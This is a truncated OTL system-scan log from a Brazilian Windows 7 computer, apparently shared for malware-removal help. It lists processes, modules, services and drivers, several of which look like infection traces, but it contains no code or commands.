OTL logfile created on: 11/01/2016 14:16:09 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Lorenzo\Desktop Ultimate Edition (Version = 6.1.7600) - Type = NTWorkstation Internet Explorer (Version = 8.0.7600.16385) Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy 2,00 Gb Total Physical Memory | 0,11 Gb Available Physical Memory | 5,44% Memory free 4,00 Gb Paging File | 1,15 Gb Available in Paging File | 28,69% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 465,76 Gb Total Space | 63,84 Gb Free Space | 13,71% Space Free | Partition Type: NTFS Computer Name: LORENZO-PC | User Name: Lorenzo | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2016/01/11 14:14:22 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Lorenzo\Desktop\OTL.exe PRC - [2016/01/05 11:26:38 | 004,628,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\config\systemprofile\AppData\Roaming\winsecurity\winsecurity.exe PRC - [2016/01/05 02:54:04 | 004,231,632 | ---- | M] (Microsoft Corporation) -- C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe PRC - [2015/12/26 01:47:07 | 000,245,576 | ---- | M] (Google Inc.) -- C:\Arquivos de Programas\Google\Update\1.3.29.1\GoogleCrashHandler.exe PRC - [2015/12/16 07:21:40 | 004,845,408 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\WinNetSvc\WinNetSvc.exe PRC - [2015/12/11 01:54:14 | 000,741,704 | ---- | M] (Google Inc.) -- C:\Arquivos de Programas\Google\Chrome\Application\chrome.exe PRC - [2015/12/10 10:56:09 | 000,193,456 | ---- | M] () -- C:\Arquivos de Programas\SkypeUpdateEx\SkypeUpdateEx.exe PRC - [2015/12/09 09:48:37 | 004,225,528 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.45\deploy\LoLPatcher.exe PRC - [2015/12/09 09:48:01 | 002,307,064 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.5\deploy\LoLLauncher.exe PRC - [2015/12/08 10:24:45 | 007,142,328 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\XBox\XBLive.exe PRC - [2015/12/04 22:20:16 | 000,336,896 | ---- | M] (BitTorrent Inc.) -- C:\Users\Lorenzo\AppData\Roaming\uTorrent\updates\3.4.5_41372\utorrentie.exe PRC - [2015/12/04 21:10:51 | 002,026,520 | ---- | M] (BitTorrent Inc.) -- C:\Users\Lorenzo\AppData\Roaming\uTorrent\uTorrent.exe PRC - [2015/11/12 11:51:02 | 001,893,896 | ---- | M] (LogMeIn Inc.) -- C:\Arquivos de Programas\LogMeIn Hamachi\hamachi-2.exe PRC - [2015/11/12 11:47:52 | 000,411,920 | ---- | M] (LogMeIn, Inc.) -- C:\Arquivos de Programas\LogMeIn Hamachi\LMIGuardianSvc.exe PRC - [2015/11/02 12:26:12 | 000,074,752 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.178\deploy\LolClient.exe PRC - [2015/10/13 14:47:55 | 001,818,928 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\Display\nvtray.exe PRC - [2015/10/13 14:47:55 | 000,938,160 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\Display\nvxdsync.exe PRC - [2015/10/13 13:03:38 | 000,416,432 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe PRC - [2015/10/12 10:28:44 | 001,433,216 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe PRC - [2015/10/12 10:28:42 | 001,773,696 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe PRC - [2015/09/07 09:06:25 | 000,142,792 | ---- | M] () -- C:\Users\Lorenzo\AppData\Roaming\DNSHelper\DNSSVC.exe PRC - [2015/08/19 18:38:26 | 000,839,288 | ---- | M] (BlueStack Systems, Inc.) -- C:\Arquivos de Programas\BlueStacks\HD-UpdaterService.exe PRC - [2015/08/19 18:37:06 | 000,413,304 | ---- | M] (BlueStack Systems, Inc.) -- C:\Arquivos de Programas\BlueStacks\HD-LogRotatorService.exe PRC - [2015/06/19 15:43:34 | 000,509,752 | ---- | M] (GAS Tecnologia LTDA) -- C:\Arquivos de Programas\Diebold\Warsaw\core.exe PRC - [2015/06/08 07:26:39 | 000,167,704 | ---- | M] (QNT) -- C:\Users\Lorenzo\AppData\Roaming\Netlog\Netlog.exe PRC - [2015/03/28 01:45:04 | 002,673,296 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\Update Core\NvBackend.exe PRC - [2015/03/28 01:45:01 | 001,878,672 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\NetService\NvNetworkService.exe PRC - [2015/03/28 01:45:00 | 020,696,720 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe PRC - [2015/03/28 01:45:00 | 005,984,400 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe PRC - [2015/03/28 01:45:00 | 000,918,160 | ---- | M] (NVIDIA Corporation) -- C:\Arquivos de Programas\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe PRC - [2014/09/18 15:30:34 | 000,009,216 | ---- | M] (Hi-Rez Studios) -- C:\Arquivos de Programas\Hi-Rez Studios\HiPatchService.exe PRC - [2014/07/21 19:15:54 | 000,546,104 | ---- | M] (GAS Tecnologia) -- C:\Arquivos de Programas\GbPlugin\gbpsv.exe PRC - [2014/01/21 17:54:00 | 001,301,688 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\system\rads_user_kernel.exe PRC - [2012/11/30 18:54:22 | 000,027,768 | ---- | M] (VIA Technologies, Inc.) -- C:\Windows\System32\ViakaraokeSrv.exe PRC - [2012/09/23 21:43:34 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) -- C:\Arquivos de Programas\Common Files\Adobe\ARM\1.0\armsvc.exe PRC - [2011/04/27 16:39:26 | 000,011,736 | ---- | M] (Microsoft Corporation) -- c:\Arquivos de Programas\Microsoft Security Client\Antimalware\MsMpEng.exe PRC - [2010/03/10 15:26:48 | 000,189,728 | ---- | M] (Protexis Inc.) -- c:\Arquivos de Programas\Common Files\Protexis\License Service\PsiService_2.exe PRC - [2009/07/13 23:14:47 | 001,121,280 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe PRC - [2009/07/13 23:14:47 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmplayer.exe PRC - [2009/07/13 23:14:42 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe PRC - [2009/07/13 23:14:30 | 000,014,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\regsvr32.exe PRC - [2009/07/13 23:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2009/07/13 23:14:15 | 000,271,360 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conhost.exe PRC - [2006/10/27 01:47:42 | 000,031,016 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Microsoft Office\Office12\GrooveMonitor.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2015/12/30 15:08:10 | 002,771,896 | ---- | M] () -- C:\ProgramData\System32\SafeGuard32.dll MOD - [2015/12/25 17:01:42 | 000,734,208 | ---- | M] () -- C:\Arquivos de Programas\Google\Chrome\Application\47.0.2526.106\chrome_elf_wk.dll MOD - [2015/12/25 17:01:32 | 000,096,768 | ---- | M] () -- C:\Arquivos de Programas\Google\Chrome\Application\47.0.2526.106\chrome_elf.dll MOD - [2015/12/24 07:46:02 | 016,792,256 | ---- | M] () -- C:\Users\Lorenzo\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.267\pepflashplayer.dll MOD - [2015/12/11 01:54:11 | 001,583,432 | ---- | M] () -- C:\Arquivos de Programas\Google\Chrome\Application\47.0.2526.106\libglesv2.dll MOD - [2015/12/11 01:54:09 | 000,081,224 | ---- | M] () -- C:\Arquivos de Programas\Google\Chrome\Application\47.0.2526.106\libegl.dll MOD - [2015/12/09 09:48:50 | 001,465,848 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.45\deploy\RiotLauncher.dll MOD - [2015/12/09 09:48:37 | 004,225,528 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.45\deploy\LoLPatcher.exe MOD - [2015/12/09 09:48:01 | 002,307,064 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.5\deploy\LoLLauncher.exe MOD - [2015/11/02 12:26:12 | 000,074,752 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.178\deploy\LolClient.exe MOD - [2015/10/14 22:32:43 | 004,885,152 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.178\deploy\Adobe AIR\Versions\1.0\Resources\WebKit.dll MOD - [2015/10/14 22:32:41 | 017,414,304 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.178\deploy\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll MOD - [2015/05/18 19:45:21 | 000,125,440 | ---- | M] () -- C:\Arquivos de Programas\WinRAR\RarExt.dll MOD - [2015/03/28 01:45:04 | 000,011,920 | ---- | M] () -- C:\Arquivos de Programas\NVIDIA Corporation\Update Core\detoured.dll MOD - [2014/01/21 17:54:00 | 001,301,688 | ---- | M] () -- C:\Riot Games\League of Legends\RADS\system\rads_user_kernel.exe MOD - [2009/07/13 23:16:20 | 000,206,336 | ---- | M] () -- \\?\C:\Windows\System32\ws2_32.dll MOD - [2009/07/13 23:16:19 | 000,348,672 | ---- | M] () -- \\?\C:\Windows\System32\winhttp.dll MOD - [2009/07/13 23:15:12 | 000,269,824 | ---- | M] () -- \\?\C:\Windows\System32\dnsapi.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV - [2016/01/05 11:26:38 | 004,628,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\config\systemprofile\AppData\Roaming\winsecurity\winsecurity.exe -- (WindowsSecurity) SRV - [2016/01/01 21:35:32 | 000,835,152 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service) SRV - [2015/12/29 09:13:54 | 000,269,504 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2015/12/16 07:21:40 | 004,845,408 | ---- | M] () [Auto | Running] -- C:\Users\Lorenzo\AppData\Roaming\WinNetSvc\WinNetSvc.exe -- (WinNetSvc) SRV - [2015/12/12 00:05:13 | 002,104,840 | ---- | M] (Electronic Arts) [On_Demand | Stopped] -- C:\Arquivos de Programas\Origin\OriginClientService.exe -- (Origin Client Service) SRV - [2015/12/10 10:56:09 | 000,193,456 | ---- | M] () [Auto | Running] -- C:\Arquivos de Programas\SkypeUpdateEx\SkypeUpdateEx.exe -- (SkypeUpdateEx) SRV - [2015/12/08 10:24:45 | 007,142,328 | ---- | M] () [Auto | Running] -- C:\Users\Lorenzo\AppData\Roaming\XBox\XBLive.exe -- (XBox) SRV - [2015/11/29 00:50:54 | 000,245,544 | ---- | M] (EasyAntiCheat Ltd) [On_Demand | Stopped] -- C:\Windows\System32\EasyAntiCheat.exe -- (EasyAntiCheat) SRV - [2015/11/12 11:51:02 | 001,893,896 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Arquivos de Programas\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc) SRV - [2015/11/12 11:47:52 | 000,411,920 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Arquivos de Programas\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc) SRV - [2015/10/13 13:03:38 | 000,416,432 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Arquivos de Programas\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe -- (Stereo Service) SRV - [2015/10/12 10:28:44 | 001,433,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc) SRV - [2015/10/12 10:28:42 | 001,773,696 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc) SRV - [2015/09/30 00:34:17 | 000,185,800 | ---- | M] () [Auto | Stopped] -- C:\Users\Lorenzo\AppData\Roaming\NetTemp\SysDnsSvc.exe -- (NetDNS) SRV - [2015/09/07 09:06:25 | 000,142,792 | ---- | M] () [Auto | Running] -- C:\Users\Lorenzo\AppData\Roaming\DNSHelper\DNSSVC.exe -- (DNSSVC) SRV - [2015/08/19 18:38:26 | 000,839,288 | ---- | M] (BlueStack Systems, Inc.) [Auto | Running] -- C:\Arquivos de Programas\BlueStacks\HD-UpdaterService.exe -- (BstHdUpdaterSvc) SRV - [2015/08/19 18:37:06 | 000,413,304 | ---- | M] (BlueStack Systems, Inc.) [Auto | Running] -- C:\Arquivos de Programas\BlueStacks\HD-LogRotatorService.exe -- (BstHdLogRotatorSvc) SRV - [2015/08/19 18:36:44 | 000,437,880 | ---- | M] (BlueStack Systems, Inc.) [On_Demand | Stopped] -- C:\Program Files\BlueStacks\HD-Service.exe -- (BstHdAndroidSvc) SRV - [2015/08/17 18:02:14 | 000,103,824 | ---- | M] (Wondershare) [On_Demand | Stopped] -- C:\Arquivos de Programas\Wondershare\Dr.Fone for Android\DriverInstall.exe -- (WsDrvInst) SRV - [2015/07/09 14:14:04 | 000,327,296 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate) SRV - [2015/06/08 07:26:39 | 000,167,704 | ---- | M] (QNT) [Auto | Running] -- C:\Users\Lorenzo\AppData\Roaming\Netlog\Netlog.exe -- (NetLogHandler) SRV - [2015/03/28 01:45:01 | 001,878,672 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Arquivos de Programas\NVIDIA Corporation\NetService\NvNetworkService.exe -- (NvNetworkService) SRV - [2015/03/28 01:45:00 | 020,696,720 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Arquivos de Programas\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe -- (NvStreamSvc) SRV - [2015/03/28 01:45:00 | 000,918,160 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Arquivos de Programas\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe -- (GfExperienceService) SRV - [2015/03/12 05:14:42 | 000,039,376 | ---- | M] (Alcohol Soft Development Team) [Auto | Stopped] -- C:\Arquivos de Programas\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe -- (AxAutoMntSrv) SRV - [2014/10/22 12:48:00 | 003,404,664 | ---- | M] (INCA Internet Co., Ltd.) [On_Demand | Stopped] -- C:\Windows\System32\GameMon.des -- (npggsvc) SRV - [2014/09/18 15:30:34 | 000,009,216 | ---- | M] (Hi-Rez Studios) [Auto | Paused] -- C:\Arquivos de Programas\Hi-Rez Studios\HiPatchService.exe -- (HiPatchService) SRV - [2014/07/21 19:15:54 | 000,546,104 | ---- | M] (GAS Tecnologia) [Auto | Running] -- C:\Arquivos de Programas\GbPlugin\gbpsv.exe -- (GbpSv) SRV - [2012/11/30 18:54:22 | 000,027,768 | ---- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\Windows\System32\ViakaraokeSrv.exe -- (VIAKaraokeService) SRV - [2012/09/23 21:43:34 | 000,065,192 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Arquivos de Programas\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2011/04/27 16:39:26 | 000,208,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- c:\Arquivos de Programas\Microsoft Security Client\Antimalware\NisSrv.exe -- (NisSrv) SRV - [2011/04/27 16:39:26 | 000,011,736 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Arquivos de Programas\Microsoft Security Client\Antimalware\MsMpEng.exe -- (MsMpSvc) SRV - [2010/03/10 15:26:48 | 000,189,728 | ---- | M] (Protexis Inc.) [Auto | Running] -- c:\Arquivos de Programas\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2) SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc) SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc) SRV - [2009/07/13 23:15:41 | 000,680,960 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2009/07/13 23:14:47 | 001,121,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc) SRV - [2006/10/27 01:47:54 | 000,065,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Microsoft Office\Office12\GrooveAuditService.exe -- (Microsoft Office Groove Audit Service) SRV - [2006/10/26 19:49:34 | 000,441,136 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE12\ODSERV.EXE -- (odserv) SRV - [2006/10/26 13:03:08 | 000,145,184 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\ybqyimxt.sys -- (ybqyimxt) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\system32\XDva424.sys -- (XDva424) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\system32\XDva409.sys -- (XDva409) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\xbvkfpob.sys -- (xbvkfpob) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\xbksdygc.sys -- (xbksdygc) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\vkxnbevk.sys -- (vkxnbevk) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\uennghax.sys -- (uennghax) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\uanjrnlt.sys -- (uanjrnlt) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\tofzztzd.sys -- (tofzztzd) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\tmowohpc.sys -- (tmowohpc) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\qzdklzhy.sys -- (qzdklzhy) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\qkkhffhs.sys -- (qkkhffhs) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\pxifntvj.sys -- (pxifntvj) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\poosmrdu.sys -- (poosmrdu) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\pmbdbbid.sys -- (pmbdbbid) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Program Files\PC Faster\5.1.0.0\PCFApiUtil.sys -- (PCFApiUtil) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\ownzcafw.sys -- (ownzcafw) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\ownesvcg.sys -- (ownesvcg) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\ragnarok bro\Ragnarok\npkcrypt.sys -- (npkcrypt) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\nacginrz.sys -- (nacginrz) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\mpgogqge.sys -- (mpgogqge) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\mnegfocx.sys -- (mnegfocx) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\kxsyjdkp.sys -- (kxsyjdkp) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\kdnrjptj.sys -- (kdnrjptj) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\ivqbcnng.sys -- (ivqbcnng) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\ihhmwxxf.sys -- (ihhmwxxf) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\icdsumag.sys -- (icdsumag) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\hufknrnf.sys -- (hufknrnf) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\hnnvkysi.sys -- (hnnvkysi) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\gqhwhkar.sys -- (gqhwhkar) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\gcugcpus.sys -- (gcugcpus) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\fwkzpvzg.sys -- (fwkzpvzg) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\flthuqic.sys -- (flthuqic) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\falqbdtw.sys -- (falqbdtw) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\erkwigff.sys -- (erkwigff) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\system32\drivers\EagleXNt.sys -- (EagleXNt) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\doyyuwpk.sys -- (doyyuwpk) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\cncfgdsc.sys -- (cncfgdsc) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\cmwednzo.sys -- (cmwednzo) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\brwktupo.sys -- (brwktupo) DRV - File not found [File_System | On_Demand | Stopped] -- C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver.sys -- (BRDriver_1_3_3_E02B25FC) DRV - File not found [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\BprotectEx.sys -- (BprotectEx) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\bjtiuenm.sys -- (bjtiuenm) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\bdfalsty.sys -- (bdfalsty) DRV - File not found [Kernel | On_Demand | Unknown] -- -- (aipu7l0j) DRV - File not found [Kernel | System | Stopped] -- C:\Windows\system32\drivers\afhyhawx.sys -- (afhyhawx) DRV - File not found [Kernel | System | Stopped] -- system32\drivers\{7f4b8170-aac1-4ebe-8a09-2cce22f7ab00}Gw.sys -- ({7f4b8170-aac1-4ebe-8a09-2cce22f7ab00}Gw) DRV - [2015/12/10 20:08:06 | 000,098,520 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\MBAMSwissArmy.sys -- (MBAMSwissArmy) DRV - [2015/11/12 11:50:58 | 000,027,040 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\hamachi.sys -- (hamachi) DRV - [2015/10/13 17:01:51 | 010,707,120 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvlddmkm.sys -- (nvlddmkm) DRV - [2015/08/19 18:36:52 | 000,132,216 | ---- | M] (BlueStack Systems) [Kernel | Auto | Running] -- C:\Arquivos de Programas\BlueStacks\HD-Hypervisor-x86.sys -- (BstHdDrv) DRV - [2015/07/25 23:44:58 | 000,329,384 | ---- | M] (Duplex Secure Ltd.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\sptd.sys -- (sptd) DRV - [2015/03/28 01:45:00 | 000,018,576 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Arquivos de Programas\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys -- (NvStreamKms) DRV - [2015/03/01 14:44:11 | 000,080,184 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudbus.sys -- (dg_ssudbus) DRV - [2015/02/17 22:07:45 | 000,243,128 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01) DRV - [2014/11/22 08:46:30 | 000,032,912 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvvad32v.sys -- (nvvad_WaveExtensible) DRV - [2014/11/10 17:36:52 | 000,029,400 | ---- | M] (GAS Tecnologia) [Kernel | System | Running] -- C:\Windows\System32\drivers\gbpndisrdn.sys -- (ndisrd) DRV - [2014/08/11 18:19:06 | 000,162,592 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvhda32v.sys -- (NVHDA) DRV - [2014/07/21 19:15:54 | 000,047,192 | ---- | M] (GAS Tecnologia) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\gbpkm.sys -- (GbpKm) DRV - [2014/06/09 07:49:00 | 000,025,088 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\RzMaelstromVAD.sys -- (RZMAELSTROMVADService) DRV - [2014/03/11 01:14:02 | 000,047,456 | ---- | M] (Baidu, Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\Bhbase.sys -- (Bhbase) DRV - [2012/11/30 18:54:18 | 001,841,784 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\viahduaa.sys -- (VIAHdAudAddService) DRV - [2011/04/27 16:25:24 | 000,065,024 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv) DRV - [2011/04/18 14:18:50 | 000,043,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\MpNWMon.sys -- (MpNWMon) DRV - [2009/12/30 11:21:18 | 000,027,192 | ---- | M] (VS Revo Group) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\revoflt.sys -- (Revoflt) DRV - [2009/09/21 01:43:50 | 000,123,776 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ss_mdm.sys -- (ss_mdm) DRV - [2009/09/21 01:43:48 | 000,098,560 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ss_bus.sys -- (ss_bus) DRV - [2009/09/21 01:43:48 | 000,014,848 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ss_mdfl.sys -- (ss_mdfl) DRV - [2009/07/13 23:19:10 | 000,175,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus) DRV - [2009/07/13 23:19:10 | 000,040,896 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt) DRV - [2009/07/13 23:19:10 | 000,028,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc) DRV - [2009/07/13 21:51:11 | 000,034,944 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb) DRV - [2009/07/13 21:28:47 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap) DRV - [2009/07/13 21:28:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID) DRV - [2008/05/08 04:13:48 | 000,048,640 | ---- | M] (Crystal Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\cwrwdm.sys -- (cwrwdm) DRV - [2007/02/15 22:57:04 | 000,034,760 | ---- | M] (SlySoft, 